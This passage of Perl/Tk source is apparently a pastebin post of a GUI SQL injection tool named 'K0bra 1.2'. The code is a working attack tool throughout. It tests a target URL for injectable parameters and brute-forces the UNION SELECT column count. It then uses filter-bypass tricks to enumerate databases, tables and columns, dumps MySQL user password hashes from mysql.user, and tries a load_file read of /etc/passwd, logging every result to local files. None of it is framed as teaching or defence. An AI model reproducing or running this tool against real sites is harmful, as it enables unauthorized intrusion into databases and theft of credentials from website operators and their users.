- $mi->resizable( 0, 0 );
- $mi->Label(
- -text => "Target : ",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 50, -y => 20 );
- my $guix = $mi->Entry(
- -width => 40,
- -text => $p,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 23, -x => 110 );
- $mi->Button(
- -width => 10,
- -text => "Extract",
- -command => \&tengorax,
- -background => $color_fondo,
- -foreground => $color_texto,
- -activebackground => $color_texto
- )->place( -y => 20, -x => 360 );
- $mi->Label(
- -text => "Host",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 60, -y => 90 );
- $mi->Label(
- -text => "User",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 200, -y => 90 );
- $mi->Label(
- -text => "Password",
- -font => "Impact",
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -x => 360, -y => 90 );
- my $hostero = $mi->Listbox(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 130, -x => 40 );
- my $usero = $mi->Listbox(
- -width => 23,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 130, -x => 180 );
- my $pasero = $mi->Listbox(
- -width => 20,
- -background => $color_fondo,
- -foreground => $color_texto
- )->place( -y => 130, -x => 340 );
- sub tengorax {
- my $page = $guix->get;
- my $save = partimealmedio($page);
- my $cop = $page;
- my $cop1 = $page;
- savefile( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
- $code =
- toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
- if ( $code =~ /RATSXPDOWN/ig ) {
- $cop1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code1 =
- toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- $mi->update;
- savefile( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
- for my $limit ( 0 .. $1 ) {
- $mi->update;
- $cop =~
- s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
- $code =
- toma( $cop
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code =~
- /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig
- )
- {
- $mi->update;
- $hostero->insert( "end", $1 );
- $usero->insert( "end", $2 );
- $pasero->insert( "end", $3 );
- savefile( $save . ".txt",
- "[Host] : $1 [User] : $2 [Password] : $3" );
- }
- else {
- last;
- }
- }
- }
- }
- else {
- $tatus->configure( -text => "Error" );
- $logo->update;
- }
- }
- }
- sub schemacolumnsdb {
- $columnero->delete( "0.0", "end" );
- my $page = $targetero->get;
- my $save = partimealmedio($page);
- $d = $tablero->curselection();
- for my $id (@$d) {
- my $da = $tablero->get($id);
- if ( $da =~ /(.*)\.(.*)/ ) {
- my ( $db, $table ) = ( $1, $2 );
- my $page3 = $page;
- my $page4 = $page;
- savefile( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- savefile( $save . ".txt", "\n[DB] : $db" );
- savefile( $save . ".txt", "[Table] : $table" );
- $page3 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code3 =
- toma( $page3
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "and"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass2 );
- if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- savefile( $save . ".txt", "[Columns length : $1 ]\n" );
- my $si = $1;
- chomp $si;
- $page4 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit2 ( 0 .. $si ) {
- $tatus->configure( -text => "Getting columns ..." );
- $logo->update;
- $code4 =
- toma( $page4
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "and"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass1 . "limit"
- . $pass1
- . $limit2 . ",1"
- . $pass2 );
- if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- $columnero->insert( "end", $1 );
- savefile( $save . ".txt", "[Column $real] : $1" );
- $real++;
- }
- }
- $tatus->configure( -text => " " );
- }
- else {
- msg( "K0bra 1.2", "information_schema not found" );
- }
- }
- }
- }
- sub schematablesdb {
- $tablero->delete( "0.0", "end" );
- my $page = $targetero->get;
- my $save = partimealmedio($page);
- $d = $datero->curselection();
- for my $id (@$d) {
- my $db = $datero->get($id);
- $tatus->configure( -text => "Getting tables ..." );
- $logo->update;
- my $page1 = $page;
- savefile( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- savefile( $save . ".txt", "[DB] : $db" );
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "where"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- $logo->update;
- savefile( $save . ".txt", "[+] Tables Length : $1\n" );
- my $limit = $1;
- $real = "1";
- for my $lim ( 0 .. $limit ) {
- $logo->update;
- $code1 =
- toma( $page
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "where"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass1 . "limit"
- . $pass1
- . $lim . ",1"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $table = $1;
- chomp $table;
- savefile( $save . ".txt", "[Table $real Found : $table ]" );
- $tablero->insert( "end", $db . "." . $table );
- $real++;
- }
- }
- $tatus->configure( -text => " " );
- }
- else {
- msg( "K0bra 1.2", "information_schema not found" );
- }
- }
- }
- sub getdbs {
- my $page = $targetero->get;
- my $save = partimealmedio($page);
- my $page1 = $page;
- $datero->delete( "0.0", "end" );
- savefile( $save . ".txt", "\n" );
- $tatus->configure( -text => "Searching DBS ..." );
- $logo->update;
- ( $pass1, $pass2 ) = &bypass($bypass);
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $limita = $1;
- $tatus->configure( -text => "Databases Length : $limita" );
- $logo->update;
- savefile( $save . ".txt", "[+] Databases Length : $limita\n" );
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit ( 0 .. $limita ) {
- $tatus->configure( -text => "Getting databases ..." );
- $logo->update;
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.schemata"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $control = $1;
- if ( $control ne "information_schema"
- and $control ne "mysql"
- and $control ne "phpmyadmin" )
- {
- $datero->insert( "end", $control );
- savefile( $save . ".txt",
- "[Database $real Found] : $control" );
- $real++;
- }
- }
- }
- $tatus->configure( -text => " " );
- $logo->update;
- }
- else {
- $tatus->configure( -text => "information_schema not found" );
- }
- }
- sub toma {
- return $nave->get( $_[0] )->content;
- }
- sub savefile {
- open( SAVE, ">>logs/webs/" . $_[0] );
- print SAVE $_[1] . "\n";
- close SAVE;
- }
- sub partimealmedio {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- my $save = $auth;
- $save =~ s/:/_/;
- return $save;
- }
- sub encode {
- my $string = $_[0];
- $hex = '0x';
- for ( split //, $string ) {
- $hex .= sprintf "%x", ord;
- }
- return $hex;
- }
- sub decode {
- $_[0] =~ s/^0x//;
- $encode = join q[], map { chr hex } $_[0] =~ /../g;
- return $encode;
- }
- sub bypass {
- if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); }
- elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
- else { return ( "+", "--" ); }
- }
- sub ascii {
- return join ',', unpack "U*", $_[0];
- }
- sub ascii_de {
- $_[0] = join q[], map { chr } split q[,], $_[0];
- return $_[0];
- }
- sub installer {
- unless ( -d "/logs/webs" ) {
- mkdir( "logs/", 777 );
- mkdir( "logs/webs/", 777 );
- }
- }
- sub aboutxa {
- $logo->Dialog(
- -title => "About",
- -buttons => ["OK"],
- -text => "Coded By Doddy H",
- -background => $color_fondo,
- -foreground => $color_texto,
- -activebackground => $color_texto
- )->Show();
- }
- sub exitnow {
- exit 1;
- }
- sub nownow {
- my $page = $targetero->get;
- my $bypass = $bypass;
- scan( $page, $bypass );
- }
- sub scan {
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- my $save = partimealmedio( $_[0] );
- $tatus->configure( -text => "Scanning ..." );
- $logo->update;
- my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
- my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
- unless ( $testar1 eq $testar2 ) {
- motor( $page, $_[1] );
- }
- else {
- $tatus->configure( -text => "Not vulnerable" );
- }
- }
- sub motor {
- my ( $gen, $save, $control ) = &length( $_[0], $_[1] );
- if ( $control eq 1 ) {
- $targetero->configure( -text => $gen );
- $tatus->configure( -text => "Enjoy the menu" );
- }
- else {
- $tatus->configure( -text => "Length columns not found" );
- }
- }
- sub length {
- $tatus->configure( -text => "Looking for the number of columns ..." );
- my $rows = "0";
- my $asc;
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
- $total = "1";
- for my $rows ( 2 .. 200 ) {
- $logo->update;
- $asc .=
- "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
- $total .= "," . $rows;
- $injection =
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $alert
- . $asc;
- $test = toma($injection);
- if ( $test =~ /RATSXPDOWN/ ) {
- @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
- $control = 1;
- my $save = partimealmedio( $_[0] );
- savefile( $save . ".txt", "\n[Target confirmed] : $page" );
- savefile( $save . ".txt", "[Bypass] : $_[1]\n" );
- savefile( $save . ".txt", "[Limit] : The site has $rows columns" );
- savefile( $save . ".txt",
- "[Data] : The number @number print data" );
- $total =~ s/$number[0]/hackman/;
- savefile(
- $save . ".txt",
- "[SQLI] : "
- . $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total
- );
- return (
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total,
- $save, $control
- );
- }
- }
- }
- sub openlogsk {
- my $cargar = partimealmedio( $targetero->get );
- $t = "logs/webs/$cargar" . ".txt";
- system("start $t");
- }
- sub details {
- my $page = $targetero->get;
- my $bypass = $bypass;
- my $save = partimealmedio($page);
- $informatero->delete( "0.0", "end" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- savefile( $save . ".txt", "\n" );
- if ( $page =~ /(.*)hackman(.*)/ig ) {
- $tatus->configure( -text => "Searching information ..." );
- $logo->update;
- my ( $start, $end ) = ( $1, $2 );
- $inforschema =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass2;
- $mysqluser =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass2;
- $test3 =
- toma( $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2 );
- $test1 = toma($inforschema);
- $test2 = toma($mysqluser);
- if ( $test2 =~ /ERTOR854/ig ) {
- savefile( $save . ".txt", "[mysql.user] : ON" );
- }
- else {
- savefile( $save . ".txt", "[mysql.user] : OFF" );
- }
- if ( $test1 =~ /ERTOR854/ig ) {
- savefile( $save . ".txt", "[information_schema.tables] : ON" );
- }
- else {
- savefile( $save . ".txt", "[information_schema.tables] : OFF" );
- }
- if ( $test3 =~ /ERTOR854/ig ) {
- savefile(
- $save . ".txt",
- "[load_file] : "
- . $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2
- );
- }
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
- $injection = $start . $concat . $end . $pass2;
- $code = toma($injection);
- if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
- $informatero->insert( "end", "DB Version : $1" );
- $informatero->insert( "end", "DB Name : $2" );
- $informatero->insert( "end", "Username : $3" );
- savefile(
- $save . ".txt",
- "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n"
- );
- $tatus->configure( -text => " " );
- }
- else {
- $tatus->configure( -text => "Not found any data" );
- }
- }
- }
- # The End ?
Add Comment
Please, Sign In to add comment